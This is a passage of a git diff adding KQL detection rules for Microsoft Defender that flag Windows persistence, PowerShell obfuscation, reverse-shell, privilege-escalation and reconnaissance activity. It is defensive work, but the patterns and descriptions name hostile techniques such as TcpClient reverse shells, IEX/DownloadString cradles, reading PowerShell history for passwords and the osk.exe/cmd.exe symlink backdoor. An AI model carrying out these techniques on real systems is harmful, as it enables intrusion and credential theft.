+| where (ProcessCommandLine contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and (ProcessCommandLine contains "reg" and ProcessCommandLine contains " add ") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_persistence_via_logon_scripts_commandline.kql b/KQL/rules/windows/process_creation/potential_persistence_via_logon_scripts_commandline.kql
new file mode 100644
index 00000000..71bd8e83
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_persistence_via_logon_scripts_commandline.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Logon Scripts - CommandLine
+// Author: Tom Ueltschi (@c_APT_ure)
+// Date: 2019-01-12
+// Level: high
+// Description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1037.001
+// False Positives:
+//   - Legitimate addition of Logon Scripts via the command line by administrators or third party tools
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_persistence_via_microsoft_compatibility_appraiser.kql b/KQL/rules/windows/process_creation/potential_persistence_via_microsoft_compatibility_appraiser.kql
new file mode 100644
index 00000000..9f3c9138
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_persistence_via_microsoft_compatibility_appraiser.kql
@@ -0,0 +1,11 @@
+// Title: Potential Persistence Via Microsoft Compatibility Appraiser
+// Author: Sreeman
+// Date: 2020-09-29
+// Level: medium
+// Description: Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks.
+// In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "run " and ProcessCommandLine contains "\\Application Experience\\Microsoft Compatibility Appraiser") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_persistence_via_netsh_helper_dll.kql b/KQL/rules/windows/process_creation/potential_persistence_via_netsh_helper_dll.kql
new file mode 100644
index 00000000..90311d71
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_persistence_via_netsh_helper_dll.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via Netsh Helper DLL
+// Author: Victor Sergeev, oscd.community
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007, attack.s0108
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "add" and ProcessCommandLine contains "helper") and (ProcessVersionInfoOriginalFileName =~ "netsh.exe" or FolderPath endswith "\\netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_persistence_via_powershell_search_order_hijacking_task.kql b/KQL/rules/windows/process_creation/potential_persistence_via_powershell_search_order_hijacking_task.kql
new file mode 100644
index 00000000..2906d3aa
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_persistence_via_powershell_search_order_hijacking_task.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via Powershell Search Order Hijacking - Task
+// Author: pH-T (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-04-08
+// Level: high
+// Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith " -windowstyle hidden" or ProcessCommandLine endswith " -w hidden" or ProcessCommandLine endswith " -ep bypass" or ProcessCommandLine endswith " -noni") and (InitiatingProcessCommandLine contains "-k netsvcs" and InitiatingProcessCommandLine contains "-s Schedule") and InitiatingProcessFolderPath =~ "C:\\WINDOWS\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql b/KQL/rules/windows/process_creation/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
new file mode 100644
index 00000000..f3ac8f24
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-14
+// Level: medium
+// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_powershell_command_line_obfuscation.kql b/KQL/rules/windows/process_creation/potential_powershell_command_line_obfuscation.kql
new file mode 100644
index 00000000..7303a9b9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_powershell_command_line_obfuscation.kql
@@ -0,0 +1,13 @@
+// Title: Potential PowerShell Command Line Obfuscation
+// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)
+// Date: 2020-10-15
+// Level: high
+// Description: Detects the PowerShell command lines with special characters
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1027, attack.t1059.001
+// False Positives:
+//   - Amazon SSM Document Worker
+//   - Windows Defender ATP
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine matches regex "\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+" or ProcessCommandLine matches regex "\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{" or ProcessCommandLine matches regex "\\^.*\\^.*\\^.*\\^.*\\^" or ProcessCommandLine matches regex "`.*`.*`.*`.*`")) and (not((InitiatingProcessFolderPath =~ "C:\\Program Files\\Amazon\\SSM\\ssm-document-worker.exe" or (ProcessCommandLine contains "new EventSource(\"Microsoft.Windows.Sense.Client.Management\"" or ProcessCommandLine contains "public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_powershell_console_history_access_attempt_via_history_file.kql b/KQL/rules/windows/process_creation/potential_powershell_console_history_access_attempt_via_history_file.kql
new file mode 100644
index 00000000..f4ea56e5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_powershell_console_history_access_attempt_via_history_file.kql
@@ -0,0 +1,13 @@
+// Title: Potential PowerShell Console History Access Attempt via History File
+// Author: Luc Génaux
+// Date: 2025-04-03
+// Level: medium
+// Description: Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt).
+// This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001
+// False Positives:
+//   - Legitimate access of the console history file is possible
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "ConsoleHost_history.txt" or ProcessCommandLine contains "(Get-PSReadLineOption).HistorySavePath"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_powershell_downgrade_attack.kql b/KQL/rules/windows/process_creation/potential_powershell_downgrade_attack.kql
new file mode 100644
index 00000000..0594325f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_powershell_downgrade_attack.kql
@@ -0,0 +1,10 @@
+// Title: Potential PowerShell Downgrade Attack
+// Author: Harish Segar (rule)
+// Date: 2020-03-20
+// Level: medium
+// Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -version 2 " or ProcessCommandLine contains " -versio 2 " or ProcessCommandLine contains " -versi 2 " or ProcessCommandLine contains " -vers 2 " or ProcessCommandLine contains " -ver 2 " or ProcessCommandLine contains " -ve 2 " or ProcessCommandLine contains " -v 2 ") and FolderPath endswith "\\powershell.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_powershell_execution_policy_tampering_proccreation.kql b/KQL/rules/windows/process_creation/potential_powershell_execution_policy_tampering_proccreation.kql
new file mode 100644
index 00000000..2604f176
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_powershell_execution_policy_tampering_proccreation.kql
@@ -0,0 +1,10 @@
+// Title: Potential PowerShell Execution Policy Tampering - ProcCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-11
+// Level: high
+// Description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy") and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "RemoteSigned" or ProcessCommandLine contains "Unrestricted")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_powershell_execution_via_dll.kql b/KQL/rules/windows/process_creation/potential_powershell_execution_via_dll.kql
new file mode 100644
index 00000000..f994a390
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_powershell_execution_via_dll.kql
@@ -0,0 +1,11 @@
+// Title: Potential PowerShell Execution Via DLL
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2018-08-25
+// Level: high
+// Description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll.
+// This detection assumes that PowerShell commands are passed via the CommandLine.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Default.GetString" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "ICM " or ProcessCommandLine contains "IEX " or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "Invoke-Expression") and ((FolderPath endswith "\\InstallUtil.exe" or FolderPath endswith "\\RegAsm.exe" or FolderPath endswith "\\RegSvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe") or (ProcessVersionInfoOriginalFileName in~ ("InstallUtil.exe", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.EXE", "RUNDLL32.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_reversed_commands.kql b/KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_reversed_commands.kql
new file mode 100644
index 00000000..6c8473d3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_reversed_commands.kql
@@ -0,0 +1,12 @@
+// Title: Potential PowerShell Obfuscation Via Reversed Commands
+// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
+// Date: 2020-10-11
+// Level: high
+// Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "hctac" or ProcessCommandLine contains "kaerb" or ProcessCommandLine contains "dnammoc" or ProcessCommandLine contains "ekovn" or ProcessCommandLine contains "eliFd" or ProcessCommandLine contains "rahc" or ProcessCommandLine contains "etirw" or ProcessCommandLine contains "golon" or ProcessCommandLine contains "tninon" or ProcessCommandLine contains "eddih" or ProcessCommandLine contains "tpircS" or ProcessCommandLine contains "ssecorp" or ProcessCommandLine contains "llehsrewop" or ProcessCommandLine contains "esnopser" or ProcessCommandLine contains "daolnwod" or ProcessCommandLine contains "tneilCbeW" or ProcessCommandLine contains "tneilc" or ProcessCommandLine contains "ptth" or ProcessCommandLine contains "elifotevas" or ProcessCommandLine contains "46esab" or ProcessCommandLine contains "htaPpmeTteG" or ProcessCommandLine contains "tcejbO" or ProcessCommandLine contains "maerts" or ProcessCommandLine contains "hcaerof" or ProcessCommandLine contains "retupmoc") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not((ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -enc ")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_wchar_char.kql b/KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_wchar_char.kql
new file mode 100644
index 00000000..977bfd90
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_wchar_char.kql
@@ -0,0 +1,10 @@
+// Title: Potential PowerShell Obfuscation Via WCHAR/CHAR
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-09
+// Level: high
+// Description: Detects suspicious encoded character syntax often used for defense evasion
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "[char]0x" or ProcessCommandLine contains "(WCHAR)0x"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_powershell_reverseshell_connection.kql b/KQL/rules/windows/process_creation/potential_powershell_reverseshell_connection.kql
new file mode 100644
index 00000000..339c452d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_powershell_reverseshell_connection.kql
@@ -0,0 +1,12 @@
+// Title: Potential Powershell ReverseShell Connection
+// Author: FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-03-03
+// Level: high
+// Description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+//   - In rare administrative cases, this function might be used to check network connectivity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " Net.Sockets.TCPClient" and ProcessCommandLine contains ".GetStream(" and ProcessCommandLine contains ".Write(") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_privilege_escalation_to_local_system.kql b/KQL/rules/windows/process_creation/potential_privilege_escalation_to_local_system.kql
new file mode 100644
index 00000000..46f43302
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_privilege_escalation_to_local_system.kql
@@ -0,0 +1,13 @@
+// Title: Potential Privilege Escalation To LOCAL SYSTEM
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-05-22
+// Level: high
+// Description: Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001
+// False Positives:
+//   - Weird admins that rename their tools
+//   - Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -s cmd" or ProcessCommandLine contains " /s cmd" or ProcessCommandLine contains " –s cmd" or ProcessCommandLine contains " —s cmd" or ProcessCommandLine contains " ―s cmd" or ProcessCommandLine contains " -s -i cmd" or ProcessCommandLine contains " -s /i cmd" or ProcessCommandLine contains " -s –i cmd" or ProcessCommandLine contains " -s —i cmd" or ProcessCommandLine contains " -s ―i cmd" or ProcessCommandLine contains " /s -i cmd" or ProcessCommandLine contains " /s /i cmd" or ProcessCommandLine contains " /s –i cmd" or ProcessCommandLine contains " /s —i cmd" or ProcessCommandLine contains " /s ―i cmd" or ProcessCommandLine contains " –s -i cmd" or ProcessCommandLine contains " –s /i cmd" or ProcessCommandLine contains " –s –i cmd" or ProcessCommandLine contains " –s —i cmd" or ProcessCommandLine contains " –s ―i cmd" or ProcessCommandLine contains " —s -i cmd" or ProcessCommandLine contains " —s /i cmd" or ProcessCommandLine contains " —s –i cmd" or ProcessCommandLine contains " —s —i cmd" or ProcessCommandLine contains " —s ―i cmd" or ProcessCommandLine contains " ―s -i cmd" or ProcessCommandLine contains " ―s /i cmd" or ProcessCommandLine contains " ―s –i cmd" or ProcessCommandLine contains " ―s —i cmd" or ProcessCommandLine contains " ―s ―i cmd" or ProcessCommandLine contains " -i -s cmd" or ProcessCommandLine contains " -i /s cmd" or ProcessCommandLine contains " -i –s cmd" or ProcessCommandLine contains " -i —s cmd" or ProcessCommandLine contains " -i ―s cmd" or ProcessCommandLine contains " /i -s cmd" or ProcessCommandLine contains " /i /s cmd" or ProcessCommandLine contains " /i –s cmd" or ProcessCommandLine contains " /i —s cmd" or ProcessCommandLine contains " /i ―s cmd" or ProcessCommandLine contains " –i -s cmd" or ProcessCommandLine contains " –i /s cmd" or ProcessCommandLine contains " –i –s cmd" or ProcessCommandLine contains " –i —s cmd" or ProcessCommandLine contains " –i ―s cmd" or ProcessCommandLine contains " —i -s cmd" or ProcessCommandLine contains " —i /s cmd" or ProcessCommandLine contains " —i –s cmd" or ProcessCommandLine contains " —i —s cmd" or ProcessCommandLine contains " —i ―s cmd" or ProcessCommandLine contains " ―i -s cmd" or ProcessCommandLine contains " ―i /s cmd" or ProcessCommandLine contains " ―i –s cmd" or ProcessCommandLine contains " ―i —s cmd" or ProcessCommandLine contains " ―i ―s cmd" or ProcessCommandLine contains " -s pwsh" or ProcessCommandLine contains " /s pwsh" or ProcessCommandLine contains " –s pwsh" or ProcessCommandLine contains " —s pwsh" or ProcessCommandLine contains " ―s pwsh" or ProcessCommandLine contains " -s -i pwsh" or ProcessCommandLine contains " -s /i pwsh" or ProcessCommandLine contains " -s –i pwsh" or ProcessCommandLine contains " -s —i pwsh" or ProcessCommandLine contains " -s ―i pwsh" or ProcessCommandLine contains " /s -i pwsh" or ProcessCommandLine contains " /s /i pwsh" or ProcessCommandLine contains " /s –i pwsh" or ProcessCommandLine contains " /s —i pwsh" or ProcessCommandLine contains " /s ―i pwsh" or ProcessCommandLine contains " –s -i pwsh" or ProcessCommandLine contains " –s /i pwsh" or ProcessCommandLine contains " –s –i pwsh" or ProcessCommandLine contains " –s —i pwsh" or ProcessCommandLine contains " –s ―i pwsh" or ProcessCommandLine contains " —s -i pwsh" or ProcessCommandLine contains " —s /i pwsh" or ProcessCommandLine contains " —s –i pwsh" or ProcessCommandLine contains " —s —i pwsh" or ProcessCommandLine contains " —s ―i pwsh" or ProcessCommandLine contains " ―s -i pwsh" or ProcessCommandLine contains " ―s /i pwsh" or ProcessCommandLine contains " ―s –i pwsh" or ProcessCommandLine contains " ―s —i pwsh" or ProcessCommandLine contains " ―s ―i pwsh" or ProcessCommandLine contains " -i -s pwsh" or ProcessCommandLine contains " -i /s pwsh" or ProcessCommandLine contains " -i –s pwsh" or ProcessCommandLine contains " -i —s pwsh" or ProcessCommandLine contains " -i ―s pwsh" or ProcessCommandLine contains " /i -s pwsh" or ProcessCommandLine contains " /i /s pwsh" or ProcessCommandLine contains " /i –s pwsh" or ProcessCommandLine contains " /i —s pwsh" or ProcessCommandLine contains " /i ―s pwsh" or ProcessCommandLine contains " –i -s pwsh" or ProcessCommandLine contains " –i /s pwsh" or ProcessCommandLine contains " –i –s pwsh" or ProcessCommandLine contains " –i —s pwsh" or ProcessCommandLine contains " –i ―s pwsh" or ProcessCommandLine contains " —i -s pwsh" or ProcessCommandLine contains " —i /s pwsh" or ProcessCommandLine contains " —i –s pwsh" or ProcessCommandLine contains " —i —s pwsh" or ProcessCommandLine contains " —i ―s pwsh" or ProcessCommandLine contains " ―i -s pwsh" or ProcessCommandLine contains " ―i /s pwsh" or ProcessCommandLine contains " ―i –s pwsh" or ProcessCommandLine contains " ―i —s pwsh" or ProcessCommandLine contains " ―i ―s pwsh" or ProcessCommandLine contains " -s powershell" or ProcessCommandLine contains " /s powershell" or ProcessCommandLine contains " –s powershell" or ProcessCommandLine contains " —s powershell" or ProcessCommandLine contains " ―s powershell" or ProcessCommandLine contains " -s -i powershell" or ProcessCommandLine contains " -s /i powershell" or ProcessCommandLine contains " -s –i powershell" or ProcessCommandLine contains " -s —i powershell" or ProcessCommandLine contains " -s ―i powershell" or ProcessCommandLine contains " /s -i powershell" or ProcessCommandLine contains " /s /i powershell" or ProcessCommandLine contains " /s –i powershell" or ProcessCommandLine contains " /s —i powershell" or ProcessCommandLine contains " /s ―i powershell" or ProcessCommandLine contains " –s -i powershell" or ProcessCommandLine contains " –s /i powershell" or ProcessCommandLine contains " –s –i powershell" or ProcessCommandLine contains " –s —i powershell" or ProcessCommandLine contains " –s ―i powershell" or ProcessCommandLine contains " —s -i powershell" or ProcessCommandLine contains " —s /i powershell" or ProcessCommandLine contains " —s –i powershell" or ProcessCommandLine contains " —s —i powershell" or ProcessCommandLine contains " —s ―i powershell" or ProcessCommandLine contains " ―s -i powershell" or ProcessCommandLine contains " ―s /i powershell" or ProcessCommandLine contains " ―s –i powershell" or ProcessCommandLine contains " ―s —i powershell" or ProcessCommandLine contains " ―s ―i powershell" or ProcessCommandLine contains " -i -s powershell" or ProcessCommandLine contains " -i /s powershell" or ProcessCommandLine contains " -i –s powershell" or ProcessCommandLine contains " -i —s powershell" or ProcessCommandLine contains " -i ―s powershell" or ProcessCommandLine contains " /i -s powershell" or ProcessCommandLine contains " /i /s powershell" or ProcessCommandLine contains " /i –s powershell" or ProcessCommandLine contains " /i —s powershell" or ProcessCommandLine contains " /i ―s powershell" or ProcessCommandLine contains " –i -s powershell" or ProcessCommandLine contains " –i /s powershell" or ProcessCommandLine contains " –i –s powershell" or ProcessCommandLine contains " –i —s powershell" or ProcessCommandLine contains " –i ―s powershell" or ProcessCommandLine contains " —i -s powershell" or ProcessCommandLine contains " —i /s powershell" or ProcessCommandLine contains " —i –s powershell" or ProcessCommandLine contains " —i —s powershell" or ProcessCommandLine contains " —i ―s powershell" or ProcessCommandLine contains " ―i -s powershell" or ProcessCommandLine contains " ―i /s powershell" or ProcessCommandLine contains " ―i –s powershell" or ProcessCommandLine contains " ―i —s powershell" or ProcessCommandLine contains " ―i ―s powershell") and (not((ProcessCommandLine contains "paexec" or ProcessCommandLine contains "PsExec" or ProcessCommandLine contains "accepteula")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql b/KQL/rules/windows/process_creation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql
new file mode 100644
index 00000000..40e96c35
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql
@@ -0,0 +1,10 @@
+// Title: Potential Privilege Escalation Using Symlink Between Osk and Cmd
+// Author: frack113
+// Date: 2022-12-11
+// Level: high
+// Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "mklink" and ProcessCommandLine contains "\\osk.exe" and ProcessCommandLine contains "\\cmd.exe") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_privilege_escalation_via_service_permissions_weakness.kql b/KQL/rules/windows/process_creation/potential_privilege_escalation_via_service_permissions_weakness.kql
new file mode 100644
index 00000000..577d9e0a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_privilege_escalation_via_service_permissions_weakness.kql
@@ -0,0 +1,10 @@
+// Title: Potential Privilege Escalation via Service Permissions Weakness
+// Author: Teymur Kheirkhabarov
+// Date: 2019-10-26
+// Level: high
+// Description: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\ImagePath" or ProcessCommandLine contains "\\FailureCommand" or ProcessCommandLine contains "\\ServiceDll") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "services") and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_process_execution_proxy_via_cl_invocation_ps1.kql b/KQL/rules/windows/process_creation/potential_process_execution_proxy_via_cl_invocation_ps1.kql
new file mode 100644
index 00000000..349588db
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_process_execution_proxy_via_cl_invocation_ps1.kql
@@ -0,0 +1,10 @@
+// Title: Potential Process Execution Proxy Via CL_Invocation.ps1
+// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova
+// Date: 2020-10-14
+// Level: medium
+// Description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "SyncInvoke "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_process_injection_via_msra_exe.kql b/KQL/rules/windows/process_creation/potential_process_injection_via_msra_exe.kql
new file mode 100644
index 00000000..821d1b96
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_process_injection_via_msra_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Process Injection Via Msra.EXE
+// Author: Alexander McDonald
+// Date: 2022-06-24
+// Level: high
+// Description: Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+// False Positives:
+//   - Legitimate use of Msra.exe
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\route.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\whoami.exe") and InitiatingProcessCommandLine endswith "msra.exe" and InitiatingProcessFolderPath endswith "\\msra.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_product_class_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/potential_product_class_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..a969a81b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_product_class_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,14 @@
+// Title: Potential Product Class Reconnaissance Via Wmic.EXE
+// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2023-02-14
+// Level: medium
+// Description: Detects the execution of WMIC in order to get a list of firewall, antivirus and antispywware products.
+// Adversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms.
+// This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, attack.discovery, attack.t1082
+// False Positives:
+//   - Legitimate use of wmic.exe for reconnaissance of firewall, antivirus and antispywware products.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "AntiVirusProduct" or ProcessCommandLine contains "AntiSpywareProduct" or ProcessCommandLine contains "FirewallProduct") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_product_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/potential_product_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..b5a3d18b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_product_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Product Reconnaissance Via Wmic.EXE
+// Author: Nasreddine Bencherchali
+// Date: 2023-02-14
+// Level: medium
+// Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
